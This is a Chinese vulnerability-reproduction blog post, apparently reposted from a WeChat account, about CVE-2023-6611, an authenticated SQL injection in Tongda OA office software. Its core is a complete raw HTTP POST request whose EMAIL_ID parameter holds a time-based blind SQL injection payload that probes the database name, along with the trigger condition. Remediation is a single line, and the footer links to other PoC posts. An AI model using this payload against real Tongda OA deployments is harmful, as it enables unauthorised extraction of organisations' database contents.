【漏洞复现】通达OA SQL注入漏洞（CVE-2023-6611）

admin

103372
文章

87
评论

2023年12月14日10:32:21评论106 views字数 1094阅读3分38秒阅读模式

声明：请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。

官网：

https://www.tongda2000.com/

漏洞编号：

CVE-2023-6611

影响范围：

通达OA >= 2017版

通达OA < 11.10

复现环境：

通达OA 2017版

0X02 漏洞复现

漏洞利用需登录。

POST /pda/pad/email/delete.php HTTP/1.1Host: 192.168.245.152User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencodedContent-Length: 174Origin: http://192.168.245.152Connection: closeReferer: http://192.168.245.152/pda/pad/main.php?P=1;djdn42kbghtfftdtfdcnf663o4;&LOGIN_OKCookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=djdn42kbghtfftdtfdcnf663o4; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=6eb35161
EMAIL_ID=1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1&A=delbox
A参数为delbox才能触发漏洞，右下角查看延时。

0X03 修复建议

升级至安全版本及其以上！

0X04

原文始发于微信公众号（皓月的笔记本）：【漏洞复现】通达OA SQL注入漏洞（CVE-2023-6611）

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】通达OA SQL注入漏洞（CVE-2023-6611）

用友U8-CRM客户关系管理系统downloadfile.php 任意文件读取漏洞

【0day】瑞友天翼应用虚拟化系统

QVD-2024-15263：禅道身份认证绕过漏洞

红海云ehr-RedseaPlatform-文件上传-PtFjk

魔方网表存在文件上传漏洞【附poc】

脸爱云一脸通智慧平台SystemMng信息泄露漏洞【附poc】

瑞友天翼应用虚拟化系统SQL注入致远程代码执行漏洞

脸爱云-UpLoadPic-任意文件上传漏洞复现

MetaCRM客户关系管理系统存在任意文件上传漏洞-PoC

douphp代码执行漏洞

发表评论

在线咨询

微信